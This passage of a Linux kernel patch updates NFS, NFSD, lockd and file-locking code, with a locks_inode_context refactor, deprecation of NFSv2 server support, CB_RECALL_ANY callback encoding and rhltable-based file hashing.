++++ b/fs/exportfs/expfs.c
+@@ -18,7 +18,7 @@
+ #include <linux/sched.h>
+ #include <linux/cred.h>
+ 
+-#define dprintk(fmt, args...) do{}while(0)
++#define dprintk(fmt, args...) pr_debug(fmt, ##args)
+ 
+ 
+ static int get_name(const struct path *path, char *name, struct dentry *child);
+@@ -132,8 +132,8 @@ static struct dentry *reconnect_one(struct vfsmount *mnt,
+ 	inode_unlock(dentry->d_inode);
+ 
+ 	if (IS_ERR(parent)) {
+-		dprintk("%s: get_parent of %ld failed, err %d\n",
+-			__func__, dentry->d_inode->i_ino, PTR_ERR(parent));
++		dprintk("get_parent of %lu failed, err %ld\n",
++			dentry->d_inode->i_ino, PTR_ERR(parent));
+ 		return parent;
+ 	}
+ 
+@@ -147,7 +147,7 @@ static struct dentry *reconnect_one(struct vfsmount *mnt,
+ 	dprintk("%s: found name: %s\n", __func__, nbuf);
+ 	tmp = lookup_one_unlocked(mnt_user_ns(mnt), nbuf, parent, strlen(nbuf));
+ 	if (IS_ERR(tmp)) {
+-		dprintk("%s: lookup failed: %d\n", __func__, PTR_ERR(tmp));
++		dprintk("lookup failed: %ld\n", PTR_ERR(tmp));
+ 		err = PTR_ERR(tmp);
+ 		goto out_err;
+ 	}
+diff --git a/fs/lockd/svc4proc.c b/fs/lockd/svc4proc.c
+index 284b019cb6529..b72023a6b4c16 100644
+--- a/fs/lockd/svc4proc.c
++++ b/fs/lockd/svc4proc.c
+@@ -52,6 +52,7 @@ nlm4svc_retrieve_args(struct svc_rqst *rqstp, struct nlm_args *argp,
+ 		*filp = file;
+ 
+ 		/* Set up the missing parts of the file_lock structure */
++		lock->fl.fl_flags = FL_POSIX;
+ 		lock->fl.fl_file  = file->f_file[mode];
+ 		lock->fl.fl_pid = current->tgid;
+ 		lock->fl.fl_start = (loff_t)lock->lock_start;
+diff --git a/fs/lockd/svclock.c b/fs/lockd/svclock.c
+index 9c1aa75441e1c..4e30f3c509701 100644
+--- a/fs/lockd/svclock.c
++++ b/fs/lockd/svclock.c
+@@ -659,11 +659,13 @@ nlmsvc_unlock(struct net *net, struct nlm_file *file, struct nlm_lock *lock)
+ 	nlmsvc_cancel_blocked(net, file, lock);
+ 
+ 	lock->fl.fl_type = F_UNLCK;
+-	if (file->f_file[O_RDONLY])
+-		error = vfs_lock_file(file->f_file[O_RDONLY], F_SETLK,
++	lock->fl.fl_file = file->f_file[O_RDONLY];
++	if (lock->fl.fl_file)
++		error = vfs_lock_file(lock->fl.fl_file, F_SETLK,
+ 					&lock->fl, NULL);
+-	if (file->f_file[O_WRONLY])
+-		error = vfs_lock_file(file->f_file[O_WRONLY], F_SETLK,
++	lock->fl.fl_file = file->f_file[O_WRONLY];
++	if (lock->fl.fl_file)
++		error |= vfs_lock_file(lock->fl.fl_file, F_SETLK,
+ 					&lock->fl, NULL);
+ 
+ 	return (error < 0)? nlm_lck_denied_nolocks : nlm_granted;
+@@ -697,9 +699,10 @@ nlmsvc_cancel_blocked(struct net *net, struct nlm_file *file, struct nlm_lock *l
+ 	block = nlmsvc_lookup_block(file, lock);
+ 	mutex_unlock(&file->f_mutex);
+ 	if (block != NULL) {
+-		mode = lock_to_openmode(&lock->fl);
+-		vfs_cancel_lock(block->b_file->f_file[mode],
+-				&block->b_call->a_args.lock.fl);
++		struct file_lock *fl = &block->b_call->a_args.lock.fl;
++
++		mode = lock_to_openmode(fl);
++		vfs_cancel_lock(block->b_file->f_file[mode], fl);
+ 		status = nlmsvc_unlink_block(block);
+ 		nlmsvc_release_block(block);
+ 	}
+diff --git a/fs/lockd/svcproc.c b/fs/lockd/svcproc.c
+index e35c05e278061..32784f508c810 100644
+--- a/fs/lockd/svcproc.c
++++ b/fs/lockd/svcproc.c
+@@ -77,6 +77,7 @@ nlmsvc_retrieve_args(struct svc_rqst *rqstp, struct nlm_args *argp,
+ 
+ 		/* Set up the missing parts of the file_lock structure */
+ 		mode = lock_to_openmode(&lock->fl);
++		lock->fl.fl_flags = FL_POSIX;
+ 		lock->fl.fl_file  = file->f_file[mode];
+ 		lock->fl.fl_pid = current->tgid;
+ 		lock->fl.fl_lmops = &nlmsvc_lock_operations;
+diff --git a/fs/lockd/svcsubs.c b/fs/lockd/svcsubs.c
+index 3515f17eaf3fb..e3b6229e7ae5c 100644
+--- a/fs/lockd/svcsubs.c
++++ b/fs/lockd/svcsubs.c
+@@ -210,7 +210,7 @@ nlm_traverse_locks(struct nlm_host *host, struct nlm_file *file,
+ {
+ 	struct inode	 *inode = nlmsvc_file_inode(file);
+ 	struct file_lock *fl;
+-	struct file_lock_context *flctx = inode->i_flctx;
++	struct file_lock_context *flctx = locks_inode_context(inode);
+ 	struct nlm_host	 *lockhost;
+ 
+ 	if (!flctx || list_empty_careful(&flctx->flc_posix))
+@@ -265,7 +265,7 @@ nlm_file_inuse(struct nlm_file *file)
+ {
+ 	struct inode	 *inode = nlmsvc_file_inode(file);
+ 	struct file_lock *fl;
+-	struct file_lock_context *flctx = inode->i_flctx;
++	struct file_lock_context *flctx = locks_inode_context(inode);
+ 
+ 	if (file->f_count || !list_empty(&file->f_blocks) || file->f_shares)
+ 		return 1;
+diff --git a/fs/locks.c b/fs/locks.c
+index 1047ab2b15e96..7d0918b8fe5d6 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -175,7 +175,7 @@ locks_get_lock_context(struct inode *inode, int type)
+ 	struct file_lock_context *ctx;
+ 
+ 	/* paired with cmpxchg() below */
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (likely(ctx) || type == F_UNLCK)
+ 		goto out;
+ 
+@@ -194,7 +194,7 @@ locks_get_lock_context(struct inode *inode, int type)
+ 	 */
+ 	if (cmpxchg(&inode->i_flctx, NULL, ctx)) {
+ 		kmem_cache_free(flctx_cache, ctx);
+-		ctx = smp_load_acquire(&inode->i_flctx);
++		ctx = locks_inode_context(inode);
+ 	}
+ out:
+ 	trace_locks_get_lock_context(inode, type, ctx);
+@@ -247,7 +247,7 @@ locks_check_ctx_file_list(struct file *filp, struct list_head *list,
+ void
+ locks_free_lock_context(struct inode *inode)
+ {
+-	struct file_lock_context *ctx = inode->i_flctx;
++	struct file_lock_context *ctx = locks_inode_context(inode);
+ 
+ 	if (unlikely(ctx)) {
+ 		locks_check_ctx_lists(inode);
+@@ -891,7 +891,7 @@ posix_test_lock(struct file *filp, struct file_lock *fl)
+ 	void *owner;
+ 	void (*func)(void);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx || list_empty_careful(&ctx->flc_posix)) {
+ 		fl->fl_type = F_UNLCK;
+ 		return;
+@@ -1483,7 +1483,7 @@ int __break_lease(struct inode *inode, unsigned int mode, unsigned int type)
+ 	new_fl->fl_flags = type;
+ 
+ 	/* typically we will check that ctx is non-NULL before calling */
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx) {
+ 		WARN_ON_ONCE(1);
+ 		goto free_lock;
+@@ -1588,7 +1588,7 @@ void lease_get_mtime(struct inode *inode, struct timespec64 *time)
+ 	struct file_lock_context *ctx;
+ 	struct file_lock *fl;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (ctx && !list_empty_careful(&ctx->flc_lease)) {
+ 		spin_lock(&ctx->flc_lock);
+ 		fl = list_first_entry_or_null(&ctx->flc_lease,
+@@ -1634,7 +1634,7 @@ int fcntl_getlease(struct file *filp)
+ 	int type = F_UNLCK;
+ 	LIST_HEAD(dispose);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (ctx && !list_empty_careful(&ctx->flc_lease)) {
+ 		percpu_down_read(&file_rwsem);
+ 		spin_lock(&ctx->flc_lock);
+@@ -1823,7 +1823,7 @@ static int generic_delete_lease(struct file *filp, void *owner)
+ 	struct file_lock_context *ctx;
+ 	LIST_HEAD(dispose);
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx) {
+ 		trace_generic_delete_lease(inode, NULL);
+ 		return error;
+@@ -2562,7 +2562,7 @@ void locks_remove_posix(struct file *filp, fl_owner_t owner)
+ 	 * posix_lock_file().  Another process could be setting a lock on this
+ 	 * file at the same time, but we wouldn't remove that lock anyway.
+ 	 */
+-	ctx =  smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx || list_empty(&ctx->flc_posix))
+ 		return;
+ 
+@@ -2635,7 +2635,7 @@ void locks_remove_file(struct file *filp)
+ {
+ 	struct file_lock_context *ctx;
+ 
+-	ctx = smp_load_acquire(&locks_inode(filp)->i_flctx);
++	ctx = locks_inode_context(locks_inode(filp));
+ 	if (!ctx)
+ 		return;
+ 
+@@ -2682,7 +2682,7 @@ bool vfs_inode_has_locks(struct inode *inode)
+ 	struct file_lock_context *ctx;
+ 	bool ret;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx)
+ 		return false;
+ 
+@@ -2863,7 +2863,7 @@ void show_fd_locks(struct seq_file *f,
+ 	struct file_lock_context *ctx;
+ 	int id = 0;
+ 
+-	ctx = smp_load_acquire(&inode->i_flctx);
++	ctx = locks_inode_context(inode);
+ 	if (!ctx)
+ 		return;
+ 
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 3fa77ad7258f2..c8a57cfde64b4 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -9,10 +9,10 @@
+ #define _TRACE_NFS4_H
+ 
+ #include <linux/tracepoint.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+-#include <trace/events/fs.h>
+-#include <trace/events/nfs.h>
++#include <trace/misc/fs.h>
++#include <trace/misc/nfs.h>
+ 
+ #define show_nfs_fattr_flags(valid) \
+ 	__print_flags((unsigned long)valid, "|", \
+diff --git a/fs/nfs/nfstrace.h b/fs/nfs/nfstrace.h
+index 8c6cc58679ff8..642f6921852fa 100644
+--- a/fs/nfs/nfstrace.h
++++ b/fs/nfs/nfstrace.h
+@@ -11,9 +11,9 @@
+ #include <linux/tracepoint.h>
+ #include <linux/iversion.h>
+ 
+-#include <trace/events/fs.h>
+-#include <trace/events/nfs.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/fs.h>
++#include <trace/misc/nfs.h>
++#include <trace/misc/sunrpc.h>
+ 
+ #define nfs_show_cache_validity(v) \
+ 	__print_flags(v, "|", \
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index f41d24b54fd1f..6a06066684172 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -667,8 +667,10 @@ static int nfs_writepage_locked(struct page *page,
+ 	int err;
+ 
+ 	if (wbc->sync_mode == WB_SYNC_NONE &&
+-	    NFS_SERVER(inode)->write_congested)
++	    NFS_SERVER(inode)->write_congested) {
++		redirty_page_for_writepage(wbc, page);
+ 		return AOP_WRITEPAGE_ACTIVATE;
++	}
+ 
+ 	nfs_inc_stats(inode, NFSIOS_VFSWRITEPAGE);
+ 	nfs_pageio_init_write(&pgio, inode, 0,
+diff --git a/fs/nfsd/Kconfig b/fs/nfsd/Kconfig
+index f6a2fd3015e75..7c441f2bd4440 100644
+--- a/fs/nfsd/Kconfig
++++ b/fs/nfsd/Kconfig
+@@ -8,6 +8,7 @@ config NFSD
+ 	select SUNRPC
+ 	select EXPORTFS
+ 	select NFS_ACL_SUPPORT if NFSD_V2_ACL
++	select NFS_ACL_SUPPORT if NFSD_V3_ACL
+ 	depends on MULTIUSER
+ 	help
+ 	  Choose Y here if you want to allow other computers to access
+@@ -26,19 +27,29 @@ config NFSD
+ 
+ 	  Below you can choose which versions of the NFS protocol are
+ 	  available to clients mounting the NFS server on this system.
+-	  Support for NFS version 2 (RFC 1094) is always available when
++	  Support for NFS version 3 (RFC 1813) is always available when
+ 	  CONFIG_NFSD is selected.
+ 
+ 	  If unsure, say N.
+ 
+-config NFSD_V2_ACL
+-	bool
++config NFSD_V2
++	bool "NFS server support for NFS version 2 (DEPRECATED)"
+ 	depends on NFSD
++	default n
++	help
++	  NFSv2 (RFC 1094) was the first publicly-released version of NFS.
++	  Unless you are hosting ancient (1990's era) NFS clients, you don't
++	  need this.
++
++	  If unsure, say N.
++
++config NFSD_V2_ACL
++	bool "NFS server support for the NFSv2 ACL protocol extension"
++	depends on NFSD_V2
+ 
+ config NFSD_V3_ACL
+ 	bool "NFS server support for the NFSv3 ACL protocol extension"
+ 	depends on NFSD
+-	select NFSD_V2_ACL
+ 	help
+ 	  Solaris NFS servers support an auxiliary NFSv3 ACL protocol that
+ 	  never became an official part of the NFS version 3 protocol.
+diff --git a/fs/nfsd/Makefile b/fs/nfsd/Makefile
+index 805c06d5f1b4b..6fffc8f03f740 100644
+--- a/fs/nfsd/Makefile
++++ b/fs/nfsd/Makefile
+@@ -10,9 +10,10 @@ obj-$(CONFIG_NFSD)	+= nfsd.o
+ # this one should be compiled first, as the tracing macros can easily blow up
+ nfsd-y			+= trace.o
+ 
+-nfsd-y 			+= nfssvc.o nfsctl.o nfsproc.o nfsfh.o vfs.o \
+-			   export.o auth.o lockd.o nfscache.o nfsxdr.o \
++nfsd-y 			+= nfssvc.o nfsctl.o nfsfh.o vfs.o \
++			   export.o auth.o lockd.o nfscache.o \
+ 			   stats.o filecache.o nfs3proc.o nfs3xdr.o
++nfsd-$(CONFIG_NFSD_V2) += nfsproc.o nfsxdr.o
+ nfsd-$(CONFIG_NFSD_V2_ACL) += nfs2acl.o
+ nfsd-$(CONFIG_NFSD_V3_ACL) += nfs3acl.o
+ nfsd-$(CONFIG_NFSD_V4)	+= nfs4proc.o nfs4xdr.o nfs4state.o nfs4idmap.o \
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index e7e6e78d965db..01d7fd108cf3d 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -12,6 +12,7 @@
+ #include "blocklayoutxdr.h"
+ #include "pnfs.h"
+ #include "filecache.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/blocklayoutxdr.c b/fs/nfsd/blocklayoutxdr.c
+index 2455dc8be18a8..1ed2f691ebb90 100644
+--- a/fs/nfsd/blocklayoutxdr.c
++++ b/fs/nfsd/blocklayoutxdr.c
+@@ -9,6 +9,7 @@
+ 
+ #include "nfsd.h"
+ #include "blocklayoutxdr.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/export.h b/fs/nfsd/export.h
+index ee0e3aba4a6e5..d03f7f6a8642d 100644
+--- a/fs/nfsd/export.h
++++ b/fs/nfsd/export.h
+@@ -115,7 +115,6 @@ struct svc_export *	rqst_find_fsidzero_export(struct svc_rqst *);
+ int			exp_rootfh(struct net *, struct auth_domain *,
+ 					char *path, struct knfsd_fh *, int maxsize);
+ __be32			exp_pseudoroot(struct svc_rqst *, struct svc_fh *);
+-__be32			nfserrno(int errno);
+ 
+ static inline void exp_put(struct svc_export *exp)
+ {
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 5cb8cce153a57..697acf5c3c681 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -1,7 +1,32 @@
++// SPDX-License-Identifier: GPL-2.0
+ /*
+- * Open file cache.
++ * The NFSD open file cache.
+  *
+  * (c) 2015 - Jeff Layton <jeff.layton@primarydata.com>
++ *
++ * An nfsd_file object is a per-file collection of open state that binds
++ * together:
++ *   - a struct file *
++ *   - a user credential
++ *   - a network namespace
++ *   - a read-ahead context
++ *   - monitoring for writeback errors
++ *
++ * nfsd_file objects are reference-counted. Consumers acquire a new
++ * object via the nfsd_file_acquire API. They manage their interest in
++ * the acquired object, and hence the object's reference count, via
++ * nfsd_file_get and nfsd_file_put. There are two varieties of nfsd_file
++ * object:
++ *
++ *  * non-garbage-collected: When a consumer wants to precisely control
++ *    the lifetime of a file's open state, it acquires a non-garbage-
++ *    collected nfsd_file. The final nfsd_file_put releases the open
++ *    state immediately.
++ *
++ *  * garbage-collected: When a consumer does not control the lifetime
++ *    of open state, it acquires a garbage-collected nfsd_file. The
++ *    final nfsd_file_put allows the open state to linger for a period
++ *    during which it may be re-used.
+  */
+ 
+ #include <linux/hash.h>
+@@ -186,12 +211,9 @@ static const struct rhashtable_params nfsd_file_rhash_params = {
+ static void
+ nfsd_file_schedule_laundrette(void)
+ {
+-	if ((atomic_read(&nfsd_file_rhash_tbl.nelems) == 0) ||
+-	    test_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags) == 0)
+-		return;
+-
+-	queue_delayed_work(system_wq, &nfsd_filecache_laundrette,
+-			NFSD_LAUNDRETTE_DELAY);
++	if (test_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags))
++		queue_delayed_work(system_wq, &nfsd_filecache_laundrette,
++				   NFSD_LAUNDRETTE_DELAY);
+ }
+ 
+ static void
+@@ -589,7 +611,8 @@ static void
+ nfsd_file_gc_worker(struct work_struct *work)
+ {
+ 	nfsd_file_gc();
+-	nfsd_file_schedule_laundrette();
++	if (list_lru_count(&nfsd_file_lru))
++		nfsd_file_schedule_laundrette();
+ }
+ 
+ static unsigned long
+diff --git a/fs/nfsd/flexfilelayout.c b/fs/nfsd/flexfilelayout.c
+index 070f90ed09b61..3ca5304440ff0 100644
+--- a/fs/nfsd/flexfilelayout.c
++++ b/fs/nfsd/flexfilelayout.c
+@@ -15,6 +15,7 @@
+ 
+ #include "flexfilelayoutxdr.h"
+ #include "pnfs.h"
++#include "vfs.h"
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_PNFS
+ 
+diff --git a/fs/nfsd/netns.h b/fs/nfsd/netns.h
+index 8c854ba3285bb..51a4b7885cae2 100644
+--- a/fs/nfsd/netns.h
++++ b/fs/nfsd/netns.h
+@@ -195,7 +195,7 @@ struct nfsd_net {
+ 
+ 	atomic_t		nfsd_courtesy_clients;
+ 	struct shrinker		nfsd_client_shrinker;
+-	struct delayed_work	nfsd_shrinker_work;
++	struct work_struct	nfsd_shrinker_work;
+ };
+ 
+ /* Simple check to find out if a given net was properly initialized */
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 39989c14c8a1e..4eae2c5af2edf 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -76,6 +76,17 @@ static __be32 *xdr_encode_empty_array(__be32 *p)
+  * 1 Protocol"
+  */
+ 
++static void encode_uint32(struct xdr_stream *xdr, u32 n)
++{
++	WARN_ON_ONCE(xdr_stream_encode_u32(xdr, n) < 0);
++}
++
++static void encode_bitmap4(struct xdr_stream *xdr, const __u32 *bitmap,
++			   size_t len)
++{
++	WARN_ON_ONCE(xdr_stream_encode_uint32_array(xdr, bitmap, len) < 0);
++}
++
+ /*
+  *	nfs_cb_opnum4
+  *
+@@ -328,6 +339,24 @@ static void encode_cb_recall4args(struct xdr_stream *xdr,
+ 	hdr->nops++;
+ }
+ 
++/*
++ * CB_RECALLANY4args
++ *
++ *	struct CB_RECALLANY4args {
++ *		uint32_t	craa_objects_to_keep;
++ *		bitmap4		craa_type_mask;
++ *	};
++ */
++static void
++encode_cb_recallany4args(struct xdr_stream *xdr,
++	struct nfs4_cb_compound_hdr *hdr, struct nfsd4_cb_recall_any *ra)
++{
++	encode_nfs_cb_opnum4(xdr, OP_CB_RECALL_ANY);
++	encode_uint32(xdr, ra->ra_keep);
++	encode_bitmap4(xdr, ra->ra_bmval, ARRAY_SIZE(ra->ra_bmval));
++	hdr->nops++;
++}
++
+ /*
+  * CB_SEQUENCE4args
+  *
+@@ -482,6 +511,26 @@ static void nfs4_xdr_enc_cb_recall(struct rpc_rqst *req, struct xdr_stream *xdr,
+ 	encode_cb_nops(&hdr);
+ }
+ 
++/*
++ * 20.6. Operation 8: CB_RECALL_ANY - Keep Any N Recallable Objects
++ */
++static void
++nfs4_xdr_enc_cb_recall_any(struct rpc_rqst *req,
++		struct xdr_stream *xdr, const void *data)
++{
++	const struct nfsd4_callback *cb = data;
++	struct nfsd4_cb_recall_any *ra;
++	struct nfs4_cb_compound_hdr hdr = {
++		.ident = cb->cb_clp->cl_cb_ident,
++		.minorversion = cb->cb_clp->cl_minorversion,
++	};
++
++	ra = container_of(cb, struct nfsd4_cb_recall_any, ra_cb);
++	encode_cb_compound4args(xdr, &hdr);
++	encode_cb_sequence4args(xdr, cb, &hdr);
++	encode_cb_recallany4args(xdr, &hdr, ra);
++	encode_cb_nops(&hdr);
++}
+ 
+ /*
+  * NFSv4.0 and NFSv4.1 XDR decode functions
+@@ -520,6 +569,28 @@ static int nfs4_xdr_dec_cb_recall(struct rpc_rqst *rqstp,
+ 	return decode_cb_op_status(xdr, OP_CB_RECALL, &cb->cb_status);
+ }
+ 
++/*
++ * 20.6. Operation 8: CB_RECALL_ANY - Keep Any N Recallable Objects
++ */
++static int
++nfs4_xdr_dec_cb_recall_any(struct rpc_rqst *rqstp,
++				  struct xdr_stream *xdr,
++				  void *data)
++{
++	struct nfsd4_callback *cb = data;
++	struct nfs4_cb_compound_hdr hdr;
++	int status;
++
++	status = decode_cb_compound4res(xdr, &hdr);
++	if (unlikely(status))
++		return status;
++	status = decode_cb_sequence4res(xdr, cb);
++	if (unlikely(status || cb->cb_seq_status))
++		return status;
++	status =  decode_cb_op_status(xdr, OP_CB_RECALL_ANY, &cb->cb_status);
++	return status;
++}
++
+ #ifdef CONFIG_NFSD_PNFS
+ /*
+  * CB_LAYOUTRECALL4args
+@@ -783,6 +854,7 @@ static const struct rpc_procinfo nfs4_cb_procedures[] = {
+ #endif
+ 	PROC(CB_NOTIFY_LOCK,	COMPOUND,	cb_notify_lock,	cb_notify_lock),
+ 	PROC(CB_OFFLOAD,	COMPOUND,	cb_offload,	cb_offload),
++	PROC(CB_RECALL_ANY,	COMPOUND,	cb_recall_any,	cb_recall_any),
+ };
+ 
+ static unsigned int nfs4_cb_counts[ARRAY_SIZE(nfs4_cb_procedures)];
+diff --git a/fs/nfsd/nfs4idmap.c b/fs/nfsd/nfs4idmap.c
+index e70a1a2999b7b..5e9809aff37eb 100644
+--- a/fs/nfsd/nfs4idmap.c
++++ b/fs/nfsd/nfs4idmap.c
+@@ -41,6 +41,7 @@
+ #include "idmap.h"
+ #include "nfsd.h"
+ #include "netns.h"
++#include "vfs.h"
+ 
+ /*
+  * Turn off idmapping when using AUTH_SYS.
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index a9105e95b59c5..ba53cd89ec62c 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -943,12 +943,7 @@ nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					&read->rd_stateid, RD_STATE,
+ 					&read->rd_nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_read: couldn't process stateid!\n");
+-		goto out;
+-	}
+-	status = nfs_ok;
+-out:
++
+ 	read->rd_rqstp = rqstp;
+ 	read->rd_fhp = &cstate->current_fh;
+ 	return status;
+@@ -1117,10 +1112,8 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		status = nfs4_preprocess_stateid_op(rqstp, cstate,
+ 				&cstate->current_fh, &setattr->sa_stateid,
+ 				WR_STATE, NULL, NULL);
+-		if (status) {
+-			dprintk("NFSD: nfsd4_setattr: couldn't process stateid!\n");
++		if (status)
+ 			return status;
+-		}
+ 	}
+ 	err = fh_want_write(&cstate->current_fh);
+ 	if (err)
+@@ -1170,10 +1163,8 @@ nfsd4_write(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			       write->wr_offset, cnt);
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 						stateid, WR_STATE, &nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_write: couldn't process stateid!\n");
++	if (status)
+ 		return status;
+-	}
+ 
+ 	write->wr_how_written = write->wr_stable_how;
+ 
+@@ -1204,17 +1195,13 @@ nfsd4_verify_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->save_fh,
+ 					    src_stateid, RD_STATE, src, NULL);
+-	if (status) {
+-		dprintk("NFSD: %s: couldn't process src stateid!\n", __func__);
++	if (status)
+ 		goto out;
+-	}
+ 
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    dst_stateid, WR_STATE, dst, NULL);
+-	if (status) {
+-		dprintk("NFSD: %s: couldn't process dst stateid!\n", __func__);
++	if (status)
+ 		goto out_put_src;
+-	}
+ 
+ 	/* fix up for NFS-specific error code */
+ 	if (!S_ISREG(file_inode((*src)->nf_file)->i_mode) ||
+@@ -1935,10 +1922,8 @@ nfsd4_fallocate(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    &fallocate->falloc_stateid,
+ 					    WR_STATE, &nf, NULL);
+-	if (status != nfs_ok) {
+-		dprintk("NFSD: nfsd4_fallocate: couldn't process stateid!\n");
++	if (status != nfs_ok)
+ 		return status;
+-	}
+ 
+ 	status = nfsd4_vfs_fallocate(rqstp, &cstate->current_fh, nf->nf_file,
+ 				     fallocate->falloc_offset,
+@@ -1994,10 +1979,8 @@ nfsd4_seek(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+ 					    &seek->seek_stateid,
+ 					    RD_STATE, &nf, NULL);
+-	if (status) {
+-		dprintk("NFSD: nfsd4_seek: couldn't process stateid!\n");
++	if (status)
+ 		return status;
+-	}
+ 
+ 	switch (seek->seek_whence) {
+ 	case NFS4_CONTENT_DATA:
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index b3f6dda930d8b..b9d694ec25d19 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -44,7 +44,9 @@
+ #include <linux/jhash.h>
+ #include <linux/string_helpers.h>
+ #include <linux/fsnotify.h>
++#include <linux/rhashtable.h>
+ #include <linux/nfs_ssc.h>
++
+ #include "xdr4.h"
+ #include "xdr4cb.h"
+ #include "vfs.h"
+@@ -84,6 +86,7 @@ static bool check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ static void nfs4_free_ol_stateid(struct nfs4_stid *stid);
+ void nfsd4_end_grace(struct nfsd_net *nn);
+ static void _free_cpntf_state_locked(struct nfsd_net *nn, struct nfs4_cpntf_state *cps);
++static void nfsd4_file_hash_remove(struct nfs4_file *fi);
+ 
+ /* Locking: */
+ 
+@@ -588,11 +591,8 @@ static void nfsd4_free_file_rcu(struct rcu_head *rcu)
+ void
+ put_nfs4_file(struct nfs4_file *fi)
+ {
+-	might_lock(&state_lock);
+-
+-	if (refcount_dec_and_lock(&fi->fi_ref, &state_lock)) {
+-		hlist_del_rcu(&fi->fi_hash);
+-		spin_unlock(&state_lock);
++	if (refcount_dec_and_test(&fi->fi_ref)) {
++		nfsd4_file_hash_remove(fi);
+ 		WARN_ON_ONCE(!list_empty(&fi->fi_clnt_odstate));
+ 		WARN_ON_ONCE(!list_empty(&fi->fi_delegations));
+ 		call_rcu(&fi->fi_rcu, nfsd4_free_file_rcu);
+@@ -717,19 +717,20 @@ static unsigned int ownerstr_hashval(struct xdr_netobj *ownername)
+ 	return ret & OWNER_HASH_MASK;
+ }
+ 
+-/* hash table for nfs4_file */
+-#define FILE_HASH_BITS                   8
+-#define FILE_HASH_SIZE                  (1 << FILE_HASH_BITS)
+-
+-static unsigned int file_hashval(struct svc_fh *fh)
+-{
+-	struct inode *inode = d_inode(fh->fh_dentry);
++static struct rhltable nfs4_file_rhltable ____cacheline_aligned_in_smp;
+ 
+-	/* XXX: why not (here & in file cache) use inode? */
+-	return (unsigned int)hash_long(inode->i_ino, FILE_HASH_BITS);
+-}
++static const struct rhashtable_params nfs4_file_rhash_params = {
++	.key_len		= sizeof_field(struct nfs4_file, fi_inode),
++	.key_offset		= offsetof(struct nfs4_file, fi_inode),
++	.head_offset		= offsetof(struct nfs4_file, fi_rlist),
+ 
+-static struct hlist_head file_hashtbl[FILE_HASH_SIZE];
++	/*
++	 * Start with a single page hash table to reduce resizing churn
++	 * on light workloads.
++	 */
++	.min_size		= 256,
++	.automatic_shrinking	= true,
++};
+ 
+ /*
+  * Check if courtesy clients have conflicting access and resolve it if possible
+@@ -1367,6 +1368,8 @@ static void revoke_delegation(struct nfs4_delegation *dp)
+ 
+ 	WARN_ON(!list_empty(&dp->dl_recall_lru));
+ 
++	trace_nfsd_stid_revoke(&dp->dl_stid);
++
+ 	if (clp->cl_minorversion) {
+ 		spin_lock(&clp->cl_lock);
+ 		dp->dl_stid.sc_type = NFS4_REVOKED_DELEG_STID;
+@@ -1831,13 +1834,12 @@ static struct nfsd4_session *alloc_session(struct nfsd4_channel_attrs *fattrs,
+ 	int numslots = fattrs->maxreqs;
+ 	int slotsize = slot_bytes(fattrs);
+ 	struct nfsd4_session *new;
